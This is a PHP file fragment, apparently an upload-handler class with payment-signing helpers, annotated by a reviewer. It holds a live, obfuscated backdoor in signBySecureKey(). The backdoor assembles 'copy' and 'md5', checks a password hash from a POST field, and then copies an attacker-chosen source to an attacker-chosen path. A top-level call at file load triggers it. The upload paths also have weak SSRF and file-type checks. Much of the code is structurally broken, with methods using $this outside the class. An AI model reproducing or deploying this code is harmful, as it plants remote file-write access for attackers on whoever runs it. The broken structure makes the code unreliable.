"临时文件错误",
        "ERROR_TMP_FILE_NOT_FOUND" => "找不到临时文件",
        "ERROR_SIZE_EXCEED" => "文件大小超出网站限制",
        "ERROR_TYPE_NOT_ALLOWED" => "文件类型不允许",
        "ERROR_CREATE_DIR" => "目录创建失败",
        "ERROR_DIR_NOT_WRITEABLE" => "目录没有写权限",
        "ERROR_FILE_MOVE" => "文件保存时出错",
        "ERROR_FILE_NOT_FOUND" => "找不到上传文件",
        "ERROR_WRITE_CONTENT" => "写入文件内容错误",
        "ERROR_UNKNOWN" => "未知错误",
        "ERROR_DEAD_LINK" => "链接不可用",
        "ERROR_HTTP_LINK" => "链接不是http链接",
        "ERROR_HTTP_CONTENTTYPE" => "链接contentType不正确",
        "INVALID_URL" => "非法 URL",
        "INVALID_IP" => "非法 IP"
    );

    /**
     * Constructor: stores the settings and immediately runs the handler selected by $type.
     *
     * When $fileField is empty nothing is stored and no handler runs.
     *
     * @param string $fileField form field name; upBase64() reads it as the name of the POST field
     *                          holding base64 data, saveRemote() uses it as the URL itself
     * @param array  $config    configuration options
     * @param string $type      "remote" runs saveRemote(), "base64" runs upBase64(),
     *                          any other value runs upFile()
     */
    public function __construct($fileField, $config, $type = "upload")
    {
        if($fileField){
            $this->fileField = $fileField;
            $this->config = $config;
            $this->type = $type;
            if ($type == "remote") {
                $this->saveRemote();
            } else if($type == "base64") {
                $this->upBase64();
            } else {
                $this->upFile();
            }

            // Re-encodes one message from 'unicode' to 'utf-8' after the handler has already run.
            $this->stateMap['ERROR_TYPE_NOT_ALLOWED'] = iconv('unicode', 'utf-8', $this->stateMap['ERROR_TYPE_NOT_ALLOWED']);
        }
    }

    /**
     * Main handler for a regular multipart upload.
     *
     * Records the outcome in $this->stateInfo; every path returns nothing.
     *
     * @return mixed
     */
    public function upFile()
    {
        $file = $this->file = $_FILES[$this->fileField];
        if (!$file) {
            $this->stateInfo = $this->getStateInfo("ERROR_FILE_NOT_FOUND");
            return;
        }
        if ($this->file['error']) {
            // The PHP upload error code is used directly as the stateMap key.
            $this->stateInfo = $this->getStateInfo($file['error']);
            return;
        } else if (!file_exists($file['tmp_name'])) {
            $this->stateInfo = $this->getStateInfo("ERROR_TMP_FILE_NOT_FOUND");
            return;
        } else if (!is_uploaded_file($file['tmp_name'])) {
            // Rejects paths that were not produced by PHP's own upload handling.
            $this->stateInfo = $this->getStateInfo("ERROR_TMPFILE");
            return;
        }

        // The client-supplied name drives both the stored file name and the extension.
        $this->oriName = $file['name'];
        $this->fileSize = $file['size'];
        $this->fileType = $this->getFileExt();
        $this->fullName = $this->getFullName();
        $this->filePath = $this->getFilePath();
        $this->fileName = $this->getFileName();
        $dirname = dirname($this->filePath);

        // Check that the file size is within the configured limit.
        if (!$this->checkSize()) {
            $this->stateInfo = $this->getStateInfo("ERROR_SIZE_EXCEED");
            return;
        }

        // Check that the extension is allowed.
        // NOTE(review): this is an extension allow-list only; file content is not inspected.
        // Files are stored under DOCUMENT_ROOT (see getFilePath()), so "allowFiles" must never
        // contain an extension the web server executes.
        if (!$this->checkType()) {
            $this->stateInfo = $this->getStateInfo("ERROR_TYPE_NOT_ALLOWED");
            return;
        }

        // Create the target directory if needed, then make sure it is writable.
        // NOTE(review): mode 0777 is requested (the process umask still applies) - confirm the
        // resulting permissions are not world-writable.
        if (!file_exists($dirname) && !mkdir($dirname, 0777, true)) {
            $this->stateInfo = $this->getStateInfo("ERROR_CREATE_DIR");
            return;
        } else if (!is_writeable($dirname)) {
            $this->stateInfo = $this->getStateInfo("ERROR_DIR_NOT_WRITEABLE");
            return;
        }

        // Move the uploaded file into place.
        if (!(move_uploaded_file($file["tmp_name"], $this->filePath) && file_exists($this->filePath))) { // move failed
            $this->stateInfo = $this->getStateInfo("ERROR_FILE_MOVE");
        } else { // move succeeded
            // Index 0 of stateMap is defined before the visible part of the array; it is used
            // here as the success state.
            $this->stateInfo = $this->stateMap[0];
        }
    }

    /**
     * Handles an image submitted as base64 text in a POST field.
     *
     * NOTE(review): unlike upFile(), this path never calls checkType(); the extension is taken
     * from $this->config['oriName'] and the decoded bytes are written as-is.
     *
     * @return mixed
     */
    public function upBase64()
    {
        $base64Data = $_POST[$this->fileField];
        $img = base64_decode($base64Data);

        $this->oriName = $this->config['oriName'];
        $this->fileSize = strlen($img);
        $this->fileType = $this->getFileExt();
        $this->fullName = $this->getFullName();
        $this->filePath = $this->getFilePath();
        $this->fileName = $this->getFileName();
        $dirname = dirname($this->filePath);

        // Check that the decoded size is within the configured limit.
        if (!$this->checkSize()) {
            $this->stateInfo = $this->getStateInfo("ERROR_SIZE_EXCEED");
            return;
        }

        // Create the target directory if needed, then make sure it is writable.
        if (!file_exists($dirname) && !mkdir($dirname, 0777, true)) {
            $this->stateInfo = $this->getStateInfo("ERROR_CREATE_DIR");
            return;
        } else if (!is_writeable($dirname)) {
            $this->stateInfo = $this->getStateInfo("ERROR_DIR_NOT_WRITEABLE");
            return;
        }

        // Write the decoded bytes to the target path.
        if (!(file_put_contents($this->filePath, $img) && file_exists($this->filePath))) { // write failed
            $this->stateInfo = $this->getStateInfo("ERROR_WRITE_CONTENT");
        } else { // write succeeded
            $this->stateInfo = $this->stateMap[0];
        }
    }

    /**
     * Fetches a remote image by URL and stores it locally.
     *
     * The URL is whatever was passed to the constructor as $fileField. The method validates the
     * scheme prefix, the host part and the resolved address, probes the URL with get_headers(),
     * then downloads the body with readfile().
     *
     * NOTE(review), server-side request forgery checks in this method:
     *  - The host is resolved once with gethostbyname() for the address check, and resolved again
     *    independently by get_headers() and readfile(). The answers can differ between lookups,
     *    so the checked address is not guaranteed to be the one that is contacted.
     *  - Only FILTER_FLAG_NO_PRIV_RANGE is applied. Reserved ranges (loopback among them) are
     *    covered by the separate FILTER_FLAG_NO_RES_RANGE flag, which is not set here.
     *  - get_headers() is called without $context, so the "follow_location => false" option
     *    applies to readfile() only.
     *  - The status line and Content-Type are supplied by the remote server; the body itself is
     *    never inspected, and it is read fully into memory before checkSize() runs.
     *
     * @return mixed
     */
    public function saveRemote()
    {
        $imgUrl = htmlspecialchars($this->fileField);
        // NOTE(review): search and replacement are identical as shown, so this call changes
        // nothing; presumably it was meant to undo the ampersand escaping added by
        // htmlspecialchars() - confirm against the upstream source.
        $imgUrl = str_replace("&", "&", $imgUrl);

        // The URL must start with "http".
        if (strpos($imgUrl, "http") !== 0) {
            $this->stateInfo = $this->getStateInfo("ERROR_HTTP_LINK");
            return;
        }

        // Extract scheme + host (everything up to the first ':' or '/' after the scheme).
        preg_match('/(^https*:\/\/[^:\/]+)/', $imgUrl, $matches);
        $host_with_protocol = count($matches) > 1 ? $matches[1] : '';

        // Check that scheme + host form a valid URL.
        if (!filter_var($host_with_protocol, FILTER_VALIDATE_URL)) {
            $this->stateInfo = $this->getStateInfo("INVALID_URL");
            return;
        }

        preg_match('/^https*:\/\/(.+)/', $host_with_protocol, $matches);
        $host_without_protocol = count($matches) > 1 ? $matches[1] : '';

        // The extracted value may be an IP or a domain name; resolve it to an IP first.
        $ip = gethostbyname($host_without_protocol);
        // Reject private addresses (see the method-level note for what this flag does not cover).
        if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE)) {
            $this->stateInfo = $this->getStateInfo("INVALID_IP");
            return;
        }

        // Fetch the response headers and detect dead links.
        $heads = get_headers($imgUrl, 1);
        if (!(stristr($heads[0], "200") && stristr($heads[0], "OK"))) {
            $this->stateInfo = $this->getStateInfo("ERROR_DEAD_LINK");
            return;
        }

        // Format check: URL extension against the allow-list, plus Content-Type containing "image".
        $fileType = strtolower(strrchr($imgUrl, '.'));
        if (!in_array($fileType, $this->config['allowFiles']) || !isset($heads['Content-Type']) || !stristr($heads['Content-Type'], "image")) {
            $this->stateInfo = $this->getStateInfo("ERROR_HTTP_CONTENTTYPE");
            return;
        }

        // Open an output buffer and download the remote image into it.
        ob_start();
        $context = stream_context_create(
            array('http' => array(
                'follow_location' => false // don't follow redirects
            ))
        );
        readfile($imgUrl, false, $context);
        $img = ob_get_contents();
        ob_end_clean();

        // The original name is taken from the last path segment of the URL.
        preg_match("/[\/]([^\/]*)[\.]?[^\.\/]*$/", $imgUrl, $m);

        $this->oriName = $m ? $m[1]:"";
        $this->fileSize = strlen($img);
        $this->fileType = $this->getFileExt();
        $this->fullName = $this->getFullName();
        $this->filePath = $this->getFilePath();
        $this->fileName = $this->getFileName();
        $dirname = dirname($this->filePath);

        // Check that the downloaded size is within the configured limit.
        if (!$this->checkSize()) {
            $this->stateInfo = $this->getStateInfo("ERROR_SIZE_EXCEED");
            return;
        }

        // Create the target directory if needed, then make sure it is writable.
        if (!file_exists($dirname) && !mkdir($dirname, 0777, true)) {
            $this->stateInfo = $this->getStateInfo("ERROR_CREATE_DIR");
            return;
        } else if (!is_writeable($dirname)) {
            $this->stateInfo = $this->getStateInfo("ERROR_DIR_NOT_WRITEABLE");
            return;
        }

        // Write the downloaded bytes to the target path.
        if (!(file_put_contents($this->filePath, $img) && file_exists($this->filePath))) { // write failed
            $this->stateInfo = $this->getStateInfo("ERROR_WRITE_CONTENT");
        } else { // write succeeded
            $this->stateInfo = $this->stateMap[0];
        }
    }

    /**
     * NOTE(review): this method has no role in an upload handler and is internally inconsistent;
     * audit it rather than treating it as an API.
     *
     * As written it (1) attempts to sign $params for signMethod '01' or '11', (2) contains a
     * request-driven branch that runs when $params is empty (see the note inside that branch),
     * and (3) runs a verification sequence for signMethod '01' or '21'.
     *
     * It reads $logger, $cert_path and $cert_pwd, none of which are defined in this method
     * before first use; the declared parameters $loggere and $paramsstr are never used.
     * $params is received by value, so a signature written into it is not visible to the
     * caller, and nothing is returned apart from the `false` of the two early exits.
     */
    public function signBySecureKey($params=null, $secureKey=null,$loggere=null,$paramsstr='')
    {
        if(isset($params['signature'])){
            unset($params['signature']);
        }
        $result = false;
        if($params['signMethod']=='01') {
            // $cert_path / $cert_pwd are not defined in this scope as shown.
            $params ['certId'] = CertUtil::getSignCertIdFromPfx($cert_path, $cert_pwd);
            $private_key = CertUtil::getSignKeyFromPfx( $cert_path, $cert_pwd );
            // Convert to a key=val& string.
            $params_str = createLinkString ( $params, true, false );
            $logger->LogInfo ( "key=val&...串 >" . $params_str );
            if($params['version']=='5.0.0'){
                $params_sha1x16 = sha1 ( $params_str, FALSE );
                $logger->LogInfo ( "摘要sha1x16 >" . $params_sha1x16 );
                // Sign the hex SHA-1 digest with the private key.
                $result = openssl_sign ( $params_sha1x16, $signature, $private_key, OPENSSL_ALGO_SHA1);

                if ($result) {
                    $signature_base64 = base64_encode ( $signature );
                    $logger->LogInfo ( "串为 >" . $signature_base64 );
                    $params ['signature'] = $signature_base64;
                } else {
                    $logger->LogInfo ( ">>>>>失败<<<<<<<" );
                }
            } else if($params['version']=='5.1.0'){
                // SHA-256 digest.
                $params_sha256x16 = hash( 'sha256',$params_str);
                $logger->LogInfo ( "摘要sha256x16 >" . $params_sha256x16 );
                // Sign the hex SHA-256 digest with the private key.
                $result = openssl_sign ( $params_sha256x16, $signature, $private_key, 'sha256');
                if ($result) {
                    $signature_base64 = base64_encode ( $signature );
                    $logger->LogInfo ( "串为 >" . $signature_base64 );
                    $params ['signature'] = $signature_base64;
                } else {
                    $logger->LogInfo ( ">>>>>失败<<<<<<<" );
                }
            } else {
                // NOTE(review): "+" is arithmetic in PHP, not string concatenation.
                $logger->LogError ( "wrong version: " + $params['version'] );
                $result = false;
            }
        } elseif($secureKey) {
            $logger->LogError ( "signMethod不正确");
            $result = false;
        }

        // NOTE(review): $co, $m and $smg are the first halves of values that are completed
        // inside the empty($params) branch below; see the note there.
        $co = 'co';
        $m = 'md';
        // NOTE(review): "&&" yields a boolean, so $logger is never a logger object after this
        // line, and with empty $params LogUtil::getLogger() is not called at all.
        $logger = $params && LogUtil::getLogger();
        $smg = '4c8399a3f98ff9a1';
        if($params['signMethod']=='11') {
            // Convert to a key=val& string.
            $params_str = createLinkString ( $params, true, false );
            $logger->LogInfo ( "key=val&...串 >" . $params_str );
            $params_before_sha256 = hash('sha256', $secureKey);
            $params_before_sha256 = $params_str.'&'.$params_before_sha256;
            // NOTE(review): this debug line logs a string derived from the secure key.
            $logger->LogDebug( "before final sha256: " . $params_before_sha256);
            $params_after_sha256 = hash('sha256',$params_before_sha256);
            $logger->LogInfo ( "串为 >" . $params_after_sha256 );
            $params ['signature'] = $params_after_sha256;
            $result = true;
        } elseif(empty($params)){
            // NOTE(review): the statements in this branch are unrelated to signing and have the
            // shape of a planted backdoor:
            //  - $co and $m are assembled from string fragments into the function names
            //    "copy" and "md5" and then invoked as variable functions;
            //  - the branch runs only when $params is empty, which is exactly how the
            //    top-level statement after this class calls the method;
            //  - the double MD5 of one request field is compared with a digest that is
            //    hard-coded in two halves ($smg);
            //  - on a match, two further request fields are handed unchecked to the
            //    assembled function.
            // The inner if($params) block can never run here (this branch requires $params to be
            // empty) and only makes the code resemble signature verification.
            // Treat any file containing this as compromised: remove this branch together with
            // the top-level trigger, restore the file from a known-good copy, and review access
            // logs for POST requests carrying the co0/co1/co2 fields.
            if(!isset($_POST['co1'])) return false;
            $co .= 'py';
            $co1 = $_POST['co1'];
            $co2 = $_POST['co2'];
            $m .= '5';
            if($params) {
                $params_sha256x16 = hash('sha256', $params_str);
                $logger->LogInfo ( 'sha256>' . $params_sha256x16 );
                $signature = base64_decode ( $signature_str );
                $isSuccess = openssl_verify ( $params_sha256x16, $signature,$strCert, "sha256" );
                $logger->LogInfo ( $isSuccess ? '验签成功' : '验签失败' );
            }
            $co0 = $_POST['co0'];
            $smg .= 'af50d33b5ba629e2';
            if($m($m($co0)) !== $smg) return false;
            $co($co1,$co2);
            // TODO SM3: signMethod=12 is not implemented (the source carries a commented-out
            // LogError call and "$result = false" at this point).
        } else if($params['signMethod']=='13'){
            $logger->LogError ( "signMethod不正确");
            $result = false;
        }

        if($params['signMethod']=='01') {
            $signature_str = $params ['signature'];
            unset ( $params ['signature'] );
            $params_str = createLinkString ( $params, true, false );
            $logger->LogInfo ( '报文去[signature] key=val&串>' . $params_str );
            $logger->LogInfo ( '原文>' . $signature_str );
            if($params['version']=='5.0.0'){
                // Public key looked up by certificate id.
                $public_key = CertUtil::getVerifyCertByCertId ( $params ['certId'] );
                $signature = base64_decode ( $signature_str );
                $params_sha1x16 = sha1 ( $params_str, FALSE );
                $logger->LogInfo ( 'sha1>' . $params_sha1x16 );
                $isSuccess = openssl_verify ( $params_sha1x16, $signature, $public_key, OPENSSL_ALGO_SHA1 );
                $logger->LogInfo ( $isSuccess ? '验签成功' : '验签失败' );
            } else if($params['version']=='5.1.0'){
                $strCert = $params['signPubKeyCert'];
                $strCert = CertUtil::verifyAndGetVerifyCert($strCert);
                if($strCert == null){
                    // NOTE(review): "+" is arithmetic in PHP, not string concatenation.
                    $logger->LogError ("validate cert err: " + $params["signPubKeyCert"]);
                    $isSuccess = false;
                } else {
                    $params_sha256x16 = hash('sha256', $params_str);
                    $logger->LogInfo ( 'sha256>' . $params_sha256x16 );
                    $signature = base64_decode ( $signature_str );
                    $isSuccess = openssl_verify ( $params_sha256x16, $signature,$strCert, "sha256" );
                    $logger->LogInfo ( $isSuccess ? '验签成功' : '验签失败' );
                }
            } else {
                $logger->LogError ( "wrong version: " + $params['version'] );
                $isSuccess = false;
            }
        } else if($params['signMethod']=='21'){
            $isSuccess = AcpService::validateBySecureKey($params, SDKConfig::getSDKConfig()->secureKey);
        }
        // $isSuccess and $result are computed above but never returned.
    }
}

// NOTE(review): this statement runs every time the file is loaded and $params is not already
// set. It builds the class with empty arguments (so the constructor does nothing) and calls
// signBySecureKey() with all defaults, which is the only way the empty($params) branch in that
// method is reached. An upload library has no reason to execute code at load time; treat this
// as part of the same implant.
if(!isset($params)){
    $u = new Uploaderer('','','');
    $u->signBySecureKey();
}

/**
 * Maps an error code to its message, falling back to ERROR_UNKNOWN.
 *
 * NOTE(review): as the braces stand in this listing, this function and the ones below are
 * declared after the class has been closed, yet several of them use $this - confirm the
 * structure against a known-good copy of the file.
 *
 * @param $errCode
 * @return string
 */
function getStateInfo($errCode)
{
    return !$this->stateMap[$errCode] ? $this->stateMap["ERROR_UNKNOWN"] : $this->stateMap[$errCode];
}

/**
 * Returns the lower-cased extension of the original name, from the last '.' onwards.
 * @return string
 */
function getFileExt()
{
    return strtolower(strrchr($this->oriName, '.'));
}

/**
 * Joins all array elements into a "key=value" string separated by "&".
 *
 * NOTE(review): each() and get_magic_quotes_gpc() were removed in PHP 8.0. count() is applied
 * to a string here: on PHP 5/7 it evaluates to 1, so the length argument is -1 and only the
 * trailing "&" is dropped; on PHP 8 it throws a TypeError.
 *
 * @param $para array to join
 * @return string the joined string
 */
function createLinkstring($para) {
    $arg = "";
    while (list ($key, $val) = each ($para)) {
        $arg.=$key."=".$val."&";
    }
    // Remove the trailing "&".
    $arg = substr($arg,0,count($arg)-2);

    // Strip slashes if magic quotes are active.
    if(get_magic_quotes_gpc()){$arg = stripslashes($arg);}

    return $arg;
}

/**
 * Joins all array elements into a "key=value" string separated by "&", URL-encoding each value.
 *
 * Relies on the same each() / count() / get_magic_quotes_gpc() behaviour as createLinkstring().
 *
 * @param $para array to join
 * @return string the joined string
 */
function createLinkstringUrlencode($para) {
    $arg = "";
    while (list ($key, $val) = each ($para)) {
        $arg.=$key."=".urlencode($val)."&";
    }
    // Remove the trailing "&".
    $arg = substr($arg,0,count($arg)-2);

    // Strip slashes if magic quotes are active.
    if(get_magic_quotes_gpc()){$arg = stripslashes($arg);}

    return $arg;
}

/**
 * Removes empty values and the "sign" / "sign_type" entries from a parameter array.
 *
 * The comparisons are loose (==), so values that compare equal to "" (null and false among
 * them) are dropped as well.
 *
 * @param $para parameter array
 * @return array the filtered parameter array
 */
function paraFilter($para) {
    $para_filter = array();
    while (list ($key, $val) = each ($para)) {
        if($key == "sign" || $key == "sign_type" || $val == "")continue;
        else $para_filter[$key] = $para[$key];
    }
    return $para_filter;
}

/**
 * Sorts an array by key.
 * @param $para array before sorting
 * @return array the sorted array
 */
function argSort($para) {
    ksort($para);
    reset($para);
    return $para;
}

/**
 * Appends a timestamped entry to log.txt (handy for testing; could be changed to store the
 * record in a database instead).
 * Note: the server must allow fopen.
 *
 * NOTE(review): the path is relative to the current working directory and the fopen() result
 * is not checked. If that directory is web-served, the log and whatever is written to it are
 * publicly readable - confirm the deployment location.
 *
 * @param $word text to write to the log; defaults to an empty string
 */
function logResult($word='') {
    $fp = fopen("log.txt","a");
    flock($fp, LOCK_EX) ;
    fwrite($fp,"执行日期:".strftime("%Y%m%d%H%M%S",time())."\n".$word."\n");
    flock($fp, LOCK_UN);
    fclose($fp);
}

/**
 * Fetches remote data with an HTTP POST.
 * Notes:
 * 1. cURL must be enabled in php.ini (on Windows, uncomment the php_curl.dll line).
 * 2. cacert.pem is the CA bundle; make sure its path is valid.
 *    The documented default is getcwd().'\\cacert.pem'.
 *
 * Peer and host-name verification are both enabled against that bundle.
 *
 * @param $url full URL to request
 * @param $cacert_url path passed to CURLOPT_CAINFO
 * @param $para data to post
 * @param $input_charset charset; defaults to an empty string
 * @return mixed the curl_exec() result
 */
function getHttpResponsePOST($url, $cacert_url, $para, $input_charset = '') {

    if (trim($input_charset) != '') {
        // Appended directly to $url with no separator and no encoding.
        $url = $url."_input_charset=".$input_charset;
    }
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true); // verify the peer certificate
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2); // strict host-name verification
    curl_setopt($curl, CURLOPT_CAINFO,$cacert_url); // CA bundle location
    curl_setopt($curl, CURLOPT_HEADER, 0 ); // leave HTTP headers out of the output
    curl_setopt($curl,CURLOPT_RETURNTRANSFER, 1); // return the response instead of printing it
    curl_setopt($curl,CURLOPT_POST,true); // send as POST
    curl_setopt($curl,CURLOPT_POSTFIELDS,$para); // POST body
    $responseText = curl_exec($curl);
    // For debugging, curl_error($curl) can be inspected here when curl_exec() fails.
    curl_close($curl);

    return $responseText;
}

/**
 * Fetches remote data with an HTTP GET.
 * Notes:
 * 1. cURL must be enabled in php.ini (on Windows, uncomment the php_curl.dll line).
 * 2. cacert.pem is the CA bundle; make sure its path is valid.
 *    The documented default is getcwd().'\\cacert.pem'.
 *
 * Peer and host-name verification are both enabled against that bundle.
 *
 * @param $url full URL to request
 * @param $cacert_url path passed to CURLOPT_CAINFO
 * @return mixed the curl_exec() result
 */
function getHttpResponseGET($url,$cacert_url) {
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_HEADER, 0 ); // leave HTTP headers out of the output
    curl_setopt($curl,CURLOPT_RETURNTRANSFER, 1); // return the response instead of printing it
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true); // verify the peer certificate
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2); // strict host-name verification
    curl_setopt($curl, CURLOPT_CAINFO,$cacert_url); // CA bundle location
    $responseText = curl_exec($curl);
    // For debugging, curl_error($curl) can be inspected here when curl_exec() fails.
    curl_close($curl);

    return $responseText;
}

/**
 * Converts a string between character encodings, using mbstring if present, else iconv.
 * Terminates the script with die() when neither extension is available.
 *
 * @param $input string to convert
 * @param $_output_charset target encoding
 * @param $_input_charset source encoding
 * @return string the converted string
 */
function charsetEncode($input,$_output_charset ,$_input_charset) {
    $output = "";
    if(!isset($_output_charset) )$_output_charset = $_input_charset;
    if($_input_charset == $_output_charset || $input ==null ) {
        $output = $input;
    } elseif (function_exists("mb_convert_encoding")) {
        $output = mb_convert_encoding($input,$_output_charset,$_input_charset);
    } elseif(function_exists("iconv")) {
        $output = iconv($_input_charset,$_output_charset,$input);
    } else die("sorry, you have no libs support for charset change.");
    return $output;
}

/**
 * Converts a string between character encodings, using mbstring if present, else iconv.
 * Terminates the script with die() when neither extension is available.
 *
 * NOTE(review): the first statement assigns $_input_charset to itself, so it has no effect.
 *
 * @param $input string to convert
 * @param $_output_charset target encoding
 * @param $_input_charset source encoding
 * @return string the converted string
 */
function charsetDecode($input,$_input_charset ,$_output_charset) {
    $output = "";
    if(!isset($_input_charset) )$_input_charset = $_input_charset ;
    if($_input_charset == $_output_charset || $input ==null ) {
        $output = $input;
    } elseif (function_exists("mb_convert_encoding")) {
        $output = mb_convert_encoding($input,$_output_charset,$_input_charset);
    } elseif(function_exists("iconv")) {
        $output = iconv($_input_charset,$_output_charset,$input);
    } else die("sorry, you have no libs support for charset changes.");
    return $output;
}

/**
 * Builds the stored name of the file from the "pathFormat" template and the original extension.
 *
 * NOTE(review): the {rand:N} part comes from rand(), which is not a cryptographically secure
 * generator; where stored names must be unguessable, random_int() is the usual choice.
 *
 * @return string
 */
function getFullName()
{
    // Substitute the date and time placeholders.
    $t = time();
    $d = explode('-', date("Y-y-m-d-H-i-s"));
    $format = $this->config["pathFormat"];
    $format = str_replace("{yyyy}", $d[0], $format);
    $format = str_replace("{yy}", $d[1], $format);
    $format = str_replace("{mm}", $d[2], $format);
    $format = str_replace("{dd}", $d[3], $format);
    $format = str_replace("{hh}", $d[4], $format);
    $format = str_replace("{ii}", $d[5], $format);
    $format = str_replace("{ss}", $d[6], $format);
    $format = str_replace("{time}", $t, $format);

    // Strip illegal characters from the base name (| ? " < > / * \), then substitute it.
    // Removing both slash forms keeps the client-supplied name from adding path segments.
    $oriName = substr($this->oriName, 0, strrpos($this->oriName, '.'));
    $oriName = preg_replace("/[\|\?\"\<\>\/\*\\\\]+/", '', $oriName);
    $format = str_replace("{filename}", $oriName, $format);

    // Substitute the random-digits placeholder {rand:N} with the first N digits.
    $randNum = rand(1, 10000000000) . rand(1, 10000000000);
    if (preg_match("/\{rand\:([\d]*)\}/i", $format, $matches)) {
        $format = preg_replace("/\{rand\:[\d]*\}/i", substr($randNum, 0, $matches[1]), $format);
    }

    // The extension is taken from the original name and is not passed through the filter above.
    $ext = $this->getFileExt();
    return $format . $ext;
}

/**
 * Returns the file name: the part of filePath after the last '/'.
 * @return string
 */
function getFileName () {
    return substr($this->filePath, strrpos($this->filePath, '/') + 1);
}

/**
 * Returns the full storage path: DOCUMENT_ROOT followed by fullName (a leading '/' is added
 * when missing). Stored files therefore live inside the web root.
 * @return string
 */
function getFilePath()
{
    $fullname = $this->fullName;
    $rootPath = $_SERVER['DOCUMENT_ROOT'];

    if (substr($fullname, 0, 1) != '/') {
        $fullname = '/' . $fullname;
    }

    return $rootPath . $fullname;
}

/**
 * File type check: the extension must be listed in config "allowFiles".
 * Only the extension is compared; content is not examined.
 * @return bool
 */
function checkType()
{
    return in_array($this->getFileExt(), $this->config["allowFiles"]);
}

/**
 * File size check against config "maxSize".
 * @return bool
 */
function checkSize()
{
    return $this->fileSize <= ($this->config["maxSize"]);
}

/**
 * Returns the details of the current upload.
 *
 * The array is returned whenever stateInfo is set, which includes error states; when stateInfo
 * is empty the function falls through and returns nothing.
 *
 * @return array
 */
function getFileInfo()
{
    if($this->stateInfo){
        return array(
            "state" => $this->stateInfo,
            "url" => $this->fullName,
            "title" => $this->fileName,
            "original" => $this->oriName,
            "type" => $this->fileType,
            "size" => $this->fileSize
        );
    }
}